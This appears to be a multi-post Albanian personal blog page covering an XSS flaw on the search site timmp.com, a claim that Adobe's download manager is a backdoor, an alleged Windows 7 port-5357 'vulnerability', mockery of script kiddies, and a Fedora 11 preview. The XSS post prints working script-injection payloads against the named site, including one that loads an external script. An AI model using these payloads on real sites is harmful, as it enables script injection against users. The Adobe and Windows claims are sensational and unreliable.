Timmp.com – Motorri i ri i kerkimit (IT’S HACKED UP)

Emmmmm , eshte pak jo e hijshme qe te flas per kete, porse gjithsesi po shkruaj disa gjera…
Me vjen keq qe me bie perhere mua te flas per problemet :(

Ky eshte nje motorr kerkimi i krijuar nga nje shqiptar, dhe kur e mora vesh lajmin u gezova shume, edhe pse ka me shume rezultate se google ,  pra eshte pune goxha serioze dhe eshte krenari per ne qe te bejm gjera te tilla, dhe nga ana tjeter uroj qe te kete sa me shume shqiptar te tille. Rastesisht duke povuar disa terma kerkimi hasa ne nje gabim:

http://www.timmp.com/index.php/search/q/all/el8

Siç e shohim motorri eshte i ndertuar ne php, dhe kjo me beri te mendoja per vulns,
Nuk duhet shume per te arritur ne rendimin e serverit dhe problemeve te tij,

http://www.timmp.com/index.php/search/q/all/%3cimg+src%3d%22jav%26%23×09%3bascript%3aalert(‘ALERT’)%3b%22%3e

Dikush qe une nuk e di sepse u mora me kete pune vetem 5 min, ke perfituar nga ky vulnerabilitet dhe ka hackuar faqen duke arritur te modifikoj edhe query.t e kerkimit.
Per konfirmim, shkoni tek http://www.timmp.com dhe kerkoni me kete kriter kerkimi:

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

Mesazhet qe paraqiten nuk jane shokuese, dikush duhet te mendonte para edhe per sigurine e faqes, faqa ne kete moment eshte e penetruar dhe me sa duket askush nuk eshte shqetesuar.
Te jesh konkurrent sot ne tregun e eger IT, do te thote qe duhet te presesh edhe sulme, qofte edhe nga administratoret e google, kujt do ti pelqente ti iknin miliona vetem se nje 20 vjeçar shkruan nje motorr kerkimi me me shume rezultate se sa vet gogòli?
Ju bej thirrje lexuesve qe te reportojn tek administratori i faqes keto probleme, tek faqa mund te egzekutohen edhe skripte te jashtme qe ndodhen ne faqe te huaja, psh <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> po ta provoni skripti do te egzekutohet ne faqe.
Te gjithe duhet ti çojm email dhe linkoni postimin ne menyre qe te kete me shume sqarime, dhe te besoj vertet qe faqa nuk eshte me e tij.

Tung tung ..

Zgjimi mengjezit – kenga e bilbilit

Zgjimi i mengjezit ka filluar te behet ca i veshtire keto kohet e fundit lol, dhe ajo zilja e celularit qe ja ben “ccrcrrrrrrrrrr” sikur nuk po durohet me :'(
Keshtu qe thash te nderroj zilen lol, para se te thyhej telefoni 😀
Te shijojm bashk disa çaste relaksi nen kengen e njohur te bilbilit.
Goxha relaksuese :)
Ja dhe nje tjeter , kesaj radhe inçizim disi me profesional..
Kenga e Bilbilit – regjistrim me profesional

Paradoks ne Universitetet Shqiptare

Mund te thoni se me pelqen kritika, porse nuk eshte e vertet.
Me pelqen te them fjale te mira , te lavderoj por jo pa vend.
E pra kete teme po ja dedikojme pedagogeve tane te dashur (nese jane te tille).
E nga tja nisim :/ , eshte fjala per fakultetet e informatikes , per te tjerat qe nuk kam njohuri nuk mund te flas.
Shumica e atyre qe pergatisin sot “eliten” shqiptare te informatikes, inxhinieret e ardhshem ,
Specialistet e Sigurise, Programatoret, Administratoret,
Specialistet e rrjetit sistemeve operative etj …etj ..nuk kane mbaruar vet per Informatike!
SI?
Po po, nuk kane mbaruar as per informatike te pergjithshme te harrojm specializimet\masterat etj,
por kane mbaruar per Fizik ose Matematik!
A mund te me thoni se ç’lidhje ka pitagora me kriptografine rijndael?
A mund te me thoni se ç’lidhje ka Isak Newtoni me nje Stack Overflow apo
me nje proçesor qe ka arritur 100%?
Dhe gjithsesi mbeten PEDAGOGE apo jo?
Pedagoge vertet mbeten, por jo Informatike ama!
Nuk dua ti heq asnjerit meritat, mund te kene metode te shkelqyer mesimdhenie,
mund te jene shkenctaret e matematikes apo fizikes, por me Informatiken jane amator dhe
jo te Diplomuar, nese jane profesionist ku e kane diplomen?
Une kete teme po e shkruaj si i jashtem, pasi personalisht nuk kam studjuar ne shqiperi porse
shume te njohur me kane sinjalizuar per situaten aty, dhe e keqa eshte se
nga mosha qe kane nuk çohen dot as nga karrigja tju hapin vendin te rinjve (pleqeri hesapi)
qe me siguri jane shume here me lart se ata.
Gjendja eshte e deshperuar, shumica e studenteve edhe pse mbarojn
“per informatik” nuk dine te shkruajn nje program, nuk dine te ndertojn nje faqe te thjeshte ne html,
nuk dine te menaxhojn nje databaze e nuk dine se ç’fare eshte LINUX..
Me duket se u bene si  shume “nuk dine” …, e kur “nuk dine” atehere si i marrin keto provime?
Pergjigjen te dashur miq po ua leme atyre qe luftojn korrupsionin dhe pedagogeve qe perhapin kulturen
, kulture qe u shpalos ne menyre perfekte nga ish ministri i kultures-rinis-dhe sekseve.

Jam shume i hidheruar per te vazhduar akoma me temen, e ne te njejten kohe u them
KURAJO te gjithe atyre pedagogeve qe kane diplome informatike
dhe jane te specializuar per ate vend pune, gjithashtu dhe studenteve nje KURAJO e madhe!
Zgjohuni, jemi ne 2o1o nuk jemi ne kohen kur u hap normalja ne Elbasan.

Adobe Systems Incorporated © na shet viruse ;)

Pershendetje….
Tema eshte pak e hidhur, dhe goxha serioze. Si introduksion po e nis me diçka goxha misterioze qe me pati ndodhur vite me pare… Ka qene dhe nje nga faktoret qe ndikuan qe te kaloja ne linux.
Mbasi mbarova formatimin e kompiuterit tim , instalova windows dhe drejtpersedrejti driverat e sistemit.
Mbas kesaj, ende pa e lidhur me internetin dhe pa i futur ndonje flash apo hardisk te jashtem i bera nje skanim me Norton ( kete perdorja atehere :S ), dhe ç’te shoh, njeri nga driverat qe kisha instaluar permbante viruse.
Akoma me interesante ishte se ne C:\windows\ ishte krijuar nje direktori qe nuk e kisha pare ndonjehere ne sistemet e tjera, hyra ne te dhe nder te tjerash gjeta:
Aplikacione gjysem te koduara, winrar me krak te gatshem dhe serial, nje aplikacion ku dilte fotoja e nje kinezi me syze e te gjitha keto ne nje kompiuter te “virgjer” te sapoformatuar..
Mbas kesaj eksperience te çuditshme, dhe nje lajmi tjeter ne Indonezi ku Maxtor shiste hardisqe (500G) me trojane brenda mu be e qarte qe keto firma kerkojn te na kene nen kontroll dhe se informacioni realisht eshte Fuqi.

Le te kalojm tek tema e dites, vendosa te shkarkoja versionin trial te Adobe Creative Suite Master Collection 4 per ta provuar ne kompiuterin personal, dhe shkarkimi funksionon zakonisht ne kete lloj frome. Ti shkarkon nje aplikacion nga akamai.com (me redirect nga adobe) dhe quhet AdobeDownloadManagerInstaller.exe dhe me ane te ketij pastaj shkarkon programin qe te nevoitet ne kete rast Creative Suite Master Collection.
Ja se ç’fare ndodhi:

Si fillim , per egzekutim aplikacioni kerkoi privilegjet e administratorit gje qe nuk me pelqeu per nje download manager, e dyta duke pasur comodo internet security te instaluar ne kompiuter kontrolloja levizjet dhe gjerat e para qe bere ishte te modifikonte \\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\ dhe ti jepte vetes privilegje te “papame” sepse startonte automatikisht me sistemin, etj etj etj keshtu qe me terhoqi vemendjen, dhe ja :) :
Faza 1 e backdoorit
Pjesa 2 – eshte duke u lidhur dhe duke shkarkuar backdoor-in dhe “programin e shkarkimit” nderkohe qe modifikon regjistrat e sistemit.

Adobe shet backdoors

Pjesa 3 – Rastesisht kapet nga Comodo Internet Security, kjo sepse adobe nuk ka shkruajtes viruesesh te mire.

Comodo Internet Security kap Backdoorin

Pse?
Sepse kane marre nje Win32.PcClient dhe e kane modifikuar paksa nderkohe qe mund te benin diçka si miqte e tyre (dmth te kodonin diçka vet, ku hashi te mos jete neper db antivirusesh).

E instalova ne kompiuter sepse isha kurioz te shikoja funksionet dhe e dergova per analiz dhe tek virus total, i vetmi qe e kapte ishte comodo, pra mos ti shajm shume se dhe aq keq nuk kane punuar.

Me shume info:
Gjate instalimit programi perdor service.exe per te pasur kontroll te plote mbi sistemin, rast ky shume i zakonshem tek trojanet.
Per ata qe e kane instaluar mund ta gjejn tek C:\Program Files\Common Files\Akamai\rswin_3629.dll
Shkarkoni Comodo Internet Security, dhe instaloni AkamaiDownloadManager dhe shikoni levizjet qe ben ne regjistrin e sistemit.
Provoni ta fshini 😀 (eshte e pamundur) duhet te çinstaloni programin ose te hyni me live cd linux dhe ta fshini nderkohe qe windows eshte fikur. Kjo eshte mbrojtja tipike e nje backdoori.
Modifikimet qe behen ne regjister jane:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\DisplayName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\Description
Si dhe ne nendirektorin parameters.
Ja dhe 2 foto:
Regjistri i infektuar

Backdoori (tek regjistri)

Zgjidhja

Shkoni tek : www.kernel.org
Shkarkoni kernelin e fundit, lexoni kodin (i gjith sistemi ne doren tuaj)
Kompiloni duke selektuar vetem hardwarin e kompiuterit.
Enjoy YOUR systM

Nese vazhdoni te perdorni winXozz, atehere shkoni tek direktoira \Akamai, çinstaloni panvarsisht se kjo nuk kam frike se nuk e ndryshone shume gjendjen.
Pastaj >Start>Run>regedit
Dhe do hapet registry editor, shkoni tek HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ dhe fshini direktorin Akamai, kjo do u lejoj me vone qe te fshini edhe ato qe nuk jane fshire tek C:\Program Files\Common Files\Akamai\*

Windows 7 Ultimate 0-day vulnerabilitet

Hellooooo 😀
Gabimisht, dhe per kuriozitet isha duke eksploruar pak nje Windows 7 Ultimate, e vertet kane bere goxha pune ne krahasim me versionet e meparshme si stabiliteti etj por mbas instalimit pashe diçka shume interesante.
Porta 5357 qendronte gjith kohes ne Listening (ne TCP dhe UDP) dhe jo nga nje proçes dosido por nga vet sistemi :)
Ky vulnerabilitet na lejon qe te terheqim informacione dhe te dergojm informacione te rrezikshme sistemit, diçka e tille eshte e lejuar dhe nga firewalli i windowsit te pakten keshtu tregoi skanimi me nmap dhe lidhja me netcat e me browsera gjithashtu.
Meqenese porta menaxhohet nga System atehere informacionet qe mund te dergohen dhe merren mund te jene kritike.
Per momentin nuk ka zgjidhje nga Microsoft, dhe reportin ta bej ndonjeri nga ju qe po lexoni kete postim.
Nuk e mbajta priv8 pasi heret a vone do dilte, keshtu qe sorry nese po fyej ndonje blackhat.
(Ah, per ata qe po e perdorin keshillohet instalimi i nje firewalli te mire dhe filtrimi i portes, kjo do e zgjidhte problemin.)
Testimi u be ne nje Windows 7 Ultimate, por besoj se dhe versionet e tjera duhet te jene vulnerabel.
Ky vulnerabilitet mund te perdoret gjithashtu per te explotuar aplikacione qe gjenden mbas firewallit te instaluara ne sistem.

Gallat me “HacKeraT” shqiptare

Duke kontrolluar postimet e kodit tek http://albanianwizard.org/Postokodin pashe diçka qe me beri te vije buzen ne gaz, ja shikoni dhe ju bashke me mua:

Security Guy says:
cfare menyre keni perdor, per te bere hacked http://webietc.privacy
Don't Fuck With Hacker u Will Be Nervous LoL   says:
hack trick
Security Guysays:
hack trick e keni zbuluar ju apo?
Don't Fuck With Hacker u Will Be Nervous LoL   says:
po
Security Guy says:
ne cka bazohet kjo hack trick?
Don't Fuck With Hacker u Will Be Nervous LoL   says:
me 4 menyra
Security Guy says:
cilat jane ato? apo si din as vet?
Security Guy says:
heh i hutuar e?
Don't Fuck With Hacker u Will Be Nervous LoL   says:
sql lfi krejt
Don't Fuck With Hacker u Will Be Nervous LoL   says:
jon te perizeme
[c=5]Security Guy[/c] says:
ahhh ... dmth keni perdor SQL, me pas keni kalu ne LFI e me pas e keni vendos hacked
Don't Fuck With Hacker u Will Be Nervous LoL   says:
po
Don't Fuck With Hacker u Will Be Nervous LoL   says:
qashtu
Don't Fuck With Hacker u Will Be Nervous LoL   says:
edhe me shell
Security Guy says:
ah po se harrova shell ...
Don't Fuck With Hacker u Will Be Nervous LoL   says:
po
Security Guy says:
po pentetrate test e degjova nga njeri qe dini
Security Guy says:
a mund te ma spjegosh se cka eshte?
Don't Fuck With Hacker u Will Be Nervous LoL   says:
walla
Don't Fuck With Hacker u Will Be Nervous LoL   says:
as une
Don't Fuck With Hacker u Will Be Nervous LoL   says:
se pasna
Don't Fuck With Hacker u Will Be Nervous LoL   says:
nje qiekt
Don't Fuck With Hacker u Will Be Nervous LoL   says:
Security Guy says:
aha me paska genjy ai daku 

Ja kjo ishte dhe biseda e zhvilluar midis personit qe ka bere bisedimin dhe HacKerIt te ketij grupit shqiptar qe kishin futur nje index ne kete faqen shqipare. Po te shohim bashk bisedimin eshte nje rast tipik i nje grupi prejt script kiddie, as nuk dine se ç’fare eshte penetration testing, paskan krijuar lfi, sql injection, dhe me shume menyra e te folurit, shkrimi “Don’t Fuck With hacker u will be Nervous Lol” pasqyron ne menyre te qarte se per ç’fare behet fjale. Dy fjale ketyre , lexoni keto tema dhe qartesoni pak mendimet:
Hacker Mania
Hackers ky keqkputim i madh
Keshille tjeter eshte te hapin syte se jane duke u perdorur, ja se per ç’fare e kam fjalen:
Industria Hacker, fjala per white-hats dhe script kiddie
Ne perfundim, i them nje FALEMINDERIT te madhe atij qe e postoi sepse jam shkrir tuj qesh.

Moment qetesie – ora 5:04 Am :=)

Ne kete moment qetesie, ndalova per nje moment per te pare vizitoret e rastit duke i lejuar vetes te shihja mbi origjinen e ip-ve.
Çuditerisht, vizitoret qe perdornin windows xp nuk ishin shume ne avantazh me ata qe perdornin linux, ku tek keta kishte dhe qe perdornin konquerror.
Ip-t per fat te keq derivonin te gjitha nga shtetet e huaja ku mbizoteronte gjermania\shba\franca\italia, kjo ishte vetem per pak kohe, por gjithsesi ky ishte nje analiim per nje kohe te shkurter ku u numuruan rreth 64 vizita ku lexoheshin postimet e fundit.
Thashe fatkeqsisht sepse nuk pashe ip shqiptare, max pashe nga maqedonia , por u falet do jeni ne gjume (shpresoj).
Me behet qejfi nga nje ane qe ka vizitor linux, e sidomos kur shoh tek ip-t hoste te universiteteve neper bot, ajo qe me pelqeu me shume ishte nje host nga trendmicro :) , ka ndonje shqiptar qe punon atje?
Mire, spo ju lodh me shume, shpresoj qe te perparojm sa me shume ne fushen IT, te ndajm informacione te pastra te pa ndikuara nga politika\ekonomia etj.. e di per disa e verteta eshte ca e hidhur por mbetet e vertet dhe shume ka qe duan te hapin syte.
Le te jemi edhe nje web *free your mind* pse jo !

t0n19ht w3 c0d3 1n h377 | Fedora 11

Edhe pak dite na ndajn nga versioni zyrtar i Fedora 11 /emri ne kod Leonida.

Ky version i ri eshte deshmuar qe ne beta qe ka ardhur me inovacione dhe sherbime shume te mira.
Vjen me fielsystemin e ri Ext4 i cili ka performanca shume me te larta se Ext3 dhe nje menaxhim hapesire me te mire, Serverin e ri X (1.6)  me nje suport me te mire grafik, nje boot ne kohe rekord prej 20 sekondash dhe DNSSEC extention i preinstaluar duke shmangur ne kete menyre nje rrezik trendy sot persa i perket sulmeve te DNS-ve.

RPM 4.6 qe vjen me nje miksim te paketave te instalimit midis atyre te vjetrave dhe atyre te openSUSE me YaST duke i shtuar kesaj Presto i cili lejon te perdoren dhe DeltaRPM , suport i ri per skedat ATI Radeon dhe ne pergjithesi me 28 inovacione te konfirmuara nga webi zyrtar.

http://fedoraproject.org/wiki/Releases/11/FeatureList

Me siguri eshte nje “Must Have” OS